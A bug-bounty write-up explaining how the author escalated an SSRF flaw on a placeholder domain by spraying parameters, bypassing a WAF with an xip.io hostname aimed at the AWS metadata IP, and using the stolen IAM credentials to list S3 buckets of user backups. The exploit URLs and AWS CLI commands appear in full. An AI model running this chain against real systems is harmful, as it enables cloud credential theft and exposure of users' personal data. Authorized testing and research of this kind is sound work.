Escalating SSRF to access all user PII via AWS metadata

Santosh Kumar Sha (@killmongar1996)

Hi, everyone

My name is Santosh Kumar Sha, and I'm a security researcher from India (Assam). In this article, I will describe how I was able to leak all user PII by exploiting an SSRF vulnerability against the AWS metadata service.

Don't go outside without a reason. Stay home, stay safe, and keep others safe too. A special request to my fellow bug-bounty hunters: take care of your health.

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau(Corben) — https://github.com/lc/gau

4. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls.
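
For reference, here is a minimal sketch of how these tools can be installed with Go. The module paths below are the ones published by the respective projects at the time of writing; check each repo's README in case they have changed.

go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest   # subdomain enumeration
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest              # probing for live URLs
go install github.com/lc/gau/v2/cmd/gau@latest                                # URLs from internet archives
go install github.com/tomnomnom/waybackurls@latest                            # URLs from the Wayback Machine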

This is the write-up of a recent bug that I found. While doing recon, I gathered all the URLs from internet archives using waybackurls and gau, then started fuzzing them for SSRF and found one. There was some filtering going on behind the server that did not allow me to access the internal metadata, but I bypassed the WAF to reach the internal AWS metadata.

Suppose the target is example.com and everything is in scope, like this:

In-scope : *.example.com

To gather all the URLs from internet archives, I used the waybackurls tool and gau.

gau -subs example.com

waybackurls example.com

There was still a chance of missing URLs, and to stay ahead of the game I didn't want to miss any URL for testing, so I also ran subfinder and piped it into waybackurls to collect URLs for every existing subdomain, saving everything to files.

gau -subs example.com >> vul1.txt

waybackurls example.com >> vul2.txt

subfinder -d example.com -silent | waybackurls >> vul3.txt

Now that we have collected all the URLs, it's time to resolve them to filter out the dead ones and keep only the URLs containing parameters for vulnerability testing. The command looks like this:

cat vul1.txt vul2.txt vul3.txt | grep "=" | sort -u | grep "?" | httpx -silent >> FUZZvul.txt
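
For readability, the same pipeline can be split across lines with comments (a minimal sketch; the behaviour is unchanged):

cat vul1.txt vul2.txt vul3.txt |   # merge the three URL lists
  grep "=" |                       # keep URLs that have key=value parameters
  sort -u |                        # de-duplicate
  grep "?" |                       # make sure a query string is present
  httpx -silent >> FUZZvul.txt     # keep only live URLs and save them for fuzzing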

After collecting all the URLs containing parameters, I started fuzzing them for SSRF, but had no success. The program is a well-known bug-bounty program, so I assumed other hunters had already tested it and it was hardened enough, and even if I did find something, the chance of a duplicate was high. I was feeling burned out, so I went out for some refreshment, but I kept thinking about it. Suddenly something hit my mind: why not test for some hidden parameters? So I decided to use my magic trick, which I call parameter spraying, with some bash tricks to append my Burp Collaborator payload and proxy all the URLs through Burp so I could check them one by one, as there were about 200 URLs. Here is the command I used for my magic parameter spraying:

xargs -a /root/magicparameter/ssrf.txt -I@ bash -c 'for url in $(cat FUZZvul.txt); do echo "$url&@=http://burpcollaborator.net"; done' | httpx -http-proxy http://127.0.0.1:8080
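
To make the one-liner easier to follow, here is a minimal sketch of the same idea written as a plain bash loop. It assumes /root/magicparameter/ssrf.txt is a wordlist of likely SSRF parameter names (url, website_url, redirect, callback, and so on), and the Collaborator host is a placeholder for your own payload domain:

# For every candidate parameter name, append it to every collected URL with a
# Burp Collaborator payload as its value, then send the requests through the
# Burp proxy so out-of-band hits can be matched back to a URL.
while read -r param; do
  while read -r url; do
    echo "${url}&${param}=http://burpcollaborator.net"
  done < FUZZvul.txt
done < /root/magicparameter/ssrf.txt | httpx -http-proxy http://127.0.0.1:8080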

Finally, I got a hit on my Burp Collaborator server, with both HTTP and DNS interactions, from a URL like:

https://www.example.com/customer/item?custom_name=test123&website_url=http://burpcollaborator.net

So I fuzzed further to reach the AWS internal metadata on the vulnerable domain, like this:

https://www.example.com/customer/item?custom_name=test123&website_url=http://169.254.169.254/

The above URL gave me a 200 OK, but no success: some filtering behind the server, or a WAF/firewall, was blocking access to the internal data in the response. But I was not ready to give up. I had spent two days on this target and was very close to a P1 bug, so leaving it was not an option, and if I wasn't fast in bypassing it, someone else might find it. Time was running fast and I had no clue at that moment.

At this point I was stuck: if I reported it as-is, it would be a blind SSRF with low impact, and someone might already have found it, so it could end up a duplicate. So I decided not to report it yet and to take the bypass as a challenge. I knew I was reaching the internal metadata because I was getting a 200 OK response, but I could not see the response body. While I was scratching my head with no ideas left, I decided to ask Google. I came across the URL "http://www.owasp.org.1ynrnhl.xip.io/", a known trick for bypassing SSRF filters on the AWS metadata IP. I decided to use it and was shocked to see that it actually worked, because the WAF/firewall was blocking the IP address, not the domain name. So whenever you are stuck, just ask Google; googling the problem is the key.
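For context, xip.io was a wildcard-DNS service: a hostname that embeds an IP address (here in xip.io's encoded form) resolves to that IP, so the request still reaches 169.254.169.254 even though the URL never contains the raw address. A quick way to confirm this before firing the payload is a DNS lookup (a minimal sketch; xip.io has since been shut down, and services like nip.io offer the same wildcard-DNS behaviour):

# at the time, this hostname resolved straight to the metadata IP
dig +short www.owasp.org.1ynrnhl.xip.io
# expected: 169.254.169.254

# xip.io is now defunct; nip.io provides the same trick, e.g.:
dig +short 169.254.169.254.nip.io
# expected: 169.254.169.254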

So the final vulnerable SSRF URL looked like this:

https://www.example.com/customer/item?custom_name=test123&website_url=http://www.owasp.org.1ynrnhl.xip.io/

Now I decided to escalate the SSRF for maximum impact.

Grabbing the AWS metadata via SSRF:

1) To get [AccessKeyId, SecretAccessKey, Token]:

https://www.example.com/customer/item?custom_name=test123&website_url=http://www.owasp.org.1ynrnhl.xip.io/latest/meta-data/iam/security-credentials/Prod

2) Now to get [instanceId, accountId, region]. The item to keep in mind is "region": "eu-west-1". Then check for the presence of security credentials; these credentials are what let us escalate further.

https://www.example.com/customer/item?custom_name=test123&website_url=http://www.owasp.org.1ynrnhl.xip.io/latest/dynamic/instance-identity/document
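
For reference, the two metadata endpoints return JSON shaped roughly like the following. This is a redacted sketch of typical IMDSv1 responses; exact fields and values will of course differ per instance.

/latest/meta-data/iam/security-credentials/Prod:
{
  "Code": "Success",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAXXXXXXXXXXXXXXXX",
  "SecretAccessKey": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
  "Token": "xxxxxxxx",
  "Expiration": "2021-01-01T00:00:00Z"
}

/latest/dynamic/instance-identity/document (among other fields):
{
  "accountId": "19xxxxxxxxxx",
  "instanceId": "i-xxxxxxxxxxxxxxxxx",
  "region": "eu-west-1"
}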

To check whether the credentials are usable, we will use the AWS CLI. For the next commands, use the data from the above requests and the region value retrieved before (eu-west-1).

$ export AWS_ACCESS_KEY_ID="[AccessKeyId]"
$ export AWS_SECRET_ACCESS_KEY="[SecretAccessKey]"
$ export AWS_DEFAULT_REGION="[region]"
$ export AWS_SESSION_TOKEN="[Token]"

Now it’s time to check the identity of the token.

$ aws sts get-caller-identity
{
    "UserId": "Axxxxxxxxxxxxxxxxx:i-xxxxxxxxxxxxxxxxx",
    "Account": "XXxxxxxxxxxx",
    "Arn": "arn:aws:sts::19xxxxxxxxxx:XXXX/XXXXXX/i-xxxxxxxxxxxxxxxxx"
}

Then I ran a simple AWS CLI command in the terminal to list the S3 buckets these credentials could see. The command used was:

aws s3 ls

The command listed the S3 buckets, and among them was one named "prodbackUP_info", so I decided to check it out, again using the AWS CLI.

aws s3 ls s3://prodbackUP_info

And I was able to list all the user backup info files. To stay on the safe side, I had already taken permission before escalating further.
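As a proof of concept (and only because permission had been granted), a single object could be pulled from the bucket with the AWS CLI. The object name below is hypothetical and only illustrates the idea:

# list the bucket contents, then fetch one object as a PoC (hypothetical key name)
aws s3 ls s3://prodbackUP_info
aws s3 cp s3://prodbackUP_info/users_backup_2021.csv ./poc_users_backup.csv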

I quickly reported the bug, and the next day the report was triaged as critical.

After seeing this, my reaction…

Takeaway

I'm sure that a lot of security researchers have already seen this process, but this is how I approached bypassing the firewall to access the AWS metadata through SSRF. So never stop when you come across filtering, a firewall, or a WAF, because there are ways to bypass them, and always try to escalate a bug to increase its impact for higher bounties.

That's one of the reasons why I wanted to share my experience, and also to highlight other techniques for exploiting such vulnerabilities.
